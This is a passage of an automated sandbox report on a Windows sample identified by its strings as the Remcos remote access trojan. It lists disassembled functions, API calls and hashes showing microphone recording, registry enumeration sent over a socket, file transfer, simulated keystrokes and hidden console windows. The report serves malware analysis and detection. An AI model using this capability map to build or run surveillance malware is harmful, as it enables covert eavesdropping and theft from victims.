                                • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Users\user\Desktop\1m70ggeepT.exe), ref: 0040749E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CurrentProcess
                                • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                • API String ID: 2050909247-4242073005
                                • Opcode ID: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
                                • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                                • Opcode Fuzzy Hash: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
                                • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _strftime.LIBCMT ref: 00401D50
                                  • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                • API String ID: 3809562944-243156785
                                • Opcode ID: 5d5d8b804b24dbb182b265a24ad27abd29ffba8ef4e2f14911defadce340a58b
                                • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                                • Opcode Fuzzy Hash: 5d5d8b804b24dbb182b265a24ad27abd29ffba8ef4e2f14911defadce340a58b
                                • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                • waveInStart.WINMM ref: 00401CFE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                • String ID: (x$dMG$|MG
                                • API String ID: 1356121797-2752281621
                                • Opcode ID: 4847331a3159101abd2f471b23cb9d67ee169c85da226fed21ec568aa636ce6b
                                • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                                • Opcode Fuzzy Hash: 4847331a3159101abd2f471b23cb9d67ee169c85da226fed21ec568aa636ce6b
                                • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                  • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                                  • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                  • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                • TranslateMessage.USER32(?), ref: 0041D4E9
                                • DispatchMessageA.USER32(?), ref: 0041D4F3
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                • String ID: Remcos
                                • API String ID: 1970332568-165870891
                                • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                                • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: (x$C:\Users\user\Desktop\1m70ggeepT.exe$Rmc-3XK1S0$hdF$Mw
                                • API String ID: 0-4178600357
                                • Opcode ID: 1c629e4396ebd3af338879a422fac1621c8df490be40c15e87bc48e2ed270b23
                                • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                • Opcode Fuzzy Hash: 1c629e4396ebd3af338879a422fac1621c8df490be40c15e87bc48e2ed270b23
                                • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 984f3823f0f42f82cc4a86ce7b4d37cd777ac44a74ee2f2d7e0058df0e398b64
                                • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                                • Opcode Fuzzy Hash: 984f3823f0f42f82cc4a86ce7b4d37cd777ac44a74ee2f2d7e0058df0e398b64
                                • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • _memcmp.LIBVCRUNTIME ref: 00445423
                                • _free.LIBCMT ref: 00445494
                                • _free.LIBCMT ref: 004454AD
                                • _free.LIBCMT ref: 004454DF
                                • _free.LIBCMT ref: 004454E8
                                • _free.LIBCMT ref: 004454F4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorLast$_abort_memcmp
                                • String ID: C
                                • API String ID: 1679612858-1037565863
                                • Opcode ID: 95a5055c0f5b4626ae5439ab0ac3d92ffbfe406232e79e21228b3c6dd4324b4e
                                • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                                • Opcode Fuzzy Hash: 95a5055c0f5b4626ae5439ab0ac3d92ffbfe406232e79e21228b3c6dd4324b4e
                                • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: tcp$udp
                                • API String ID: 0-3725065008
                                • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                                • SetLastError.KERNEL32(000000C1,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                                • GetNativeSystemInfo.KERNEL32(?,?,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
                                • SetLastError.KERNEL32(0000000E), ref: 00411DC9
                                  • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,00411DE7,?,00000000,00003000,00000040,00000000), ref: 00411CB3
                                • GetProcessHeap.KERNEL32(00000008,00000040), ref: 00411E10
                                • HeapAlloc.KERNEL32(00000000), ref: 00411E17
                                • SetLastError.KERNEL32(0000045A), ref: 00411F2A
                                  • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37), ref: 004120E7
                                  • Part of subcall function 00412077: HeapFree.KERNEL32(00000000), ref: 004120EE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                • String ID: t^F
                                • API String ID: 3950776272-389975521
                                • Opcode ID: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
                                • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                                • Opcode Fuzzy Hash: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
                                • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __Init_thread_footer.LIBCMT ref: 004018BE
                                • ExitThread.KERNEL32 ref: 004018F6
                                • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                • String ID: PkG$hpw$NG$NG
                                • API String ID: 1649129571-1814069858
                                • Opcode ID: a9a7ce0a0b90b44db80bc4e59ffcd89cd879969cdb5479c222021ee2e07a9105
                                • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                                • Opcode Fuzzy Hash: a9a7ce0a0b90b44db80bc4e59ffcd89cd879969cdb5479c222021ee2e07a9105
                                • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46
                                  • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                  • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                • RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEnumInfoOpenQuerysend
                                • String ID: hdF$xUG$NG$NG$TG
                                • API String ID: 3114080316-2774981958
                                • Opcode ID: f05c03517f952f3a355b8cbbd5c3f5256b4ab212a1f163f9846f57004d6dde5d
                                • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                                • Opcode Fuzzy Hash: f05c03517f952f3a355b8cbbd5c3f5256b4ab212a1f163f9846f57004d6dde5d
                                • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
                                • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                                • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                  • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                  • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000), ref: 00404BC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                • String ID: .part
                                • API String ID: 1303771098-3499674018
                                • Opcode ID: e279c082a0d0910cbf5de12e36227e1aa9d15681696cbfcdd7b3720dc44f8cc2
                                • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                                • Opcode Fuzzy Hash: e279c082a0d0910cbf5de12e36227e1aa9d15681696cbfcdd7b3720dc44f8cc2
                                • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,(x), ref: 0041363D
                                  • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                  • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                  • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                  • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                • _wcslen.LIBCMT ref: 0041B763
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                • String ID: (x$.exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                • API String ID: 3286818993-4145380074
                                • Opcode ID: ff64268ecf0c31a6c4424bc126999b380d0383f46c80c29dc48f1e307bbff0a4
                                • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                • Opcode Fuzzy Hash: ff64268ecf0c31a6c4424bc126999b380d0383f46c80c29dc48f1e307bbff0a4
                                • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                • GetConsoleWindow.KERNEL32 ref: 0041CDAA
                                • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Console$Window$AllocOutputShow
                                • String ID: Remcos v$4.9.4 Pro$CONOUT$
                                • API String ID: 4067487056-3065609815
                                • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                                • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
                                • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: InputSend
                                • String ID:
                                • API String ID: 3431551938-0
                                • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                                • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: __freea$__alloca_probe_16_free
                                • String ID: a/p$am/pm$zD
                                • API String ID: 2936374016-2723203690
                                • Opcode ID: e0ecee58873bfc0077d13325f43c3460f208f04ecf7db505f3535ec2a758da20
                                • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                                • Opcode Fuzzy Hash: e0ecee58873bfc0077d13325f43c3460f208f04ecf7db505f3535ec2a758da20
                                • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Enum$InfoQueryValue
                                • String ID: [regsplt]$xUG$TG
                                • API String ID: 3554306468-1165877943
                                • Opcode ID: 93e1897ebdc99b88186db92230c2e95498abfdd16b02543cd39a55fa0a109888
                                • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                                • Opcode Fuzzy Hash: 93e1897ebdc99b88186db92230c2e95498abfdd16b02543cd39a55fa0a109888
                                • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: D[E$D[E
                                • API String ID: 269201875-3695742444
                                • Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                                • Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F8C8,?,00000000,?,00000001,?,000000FF,00000001,0043F8C8,?), ref: 00451179
                                • __alloca_probe_16.LIBCMT ref: 004511B1
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451202
                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451214
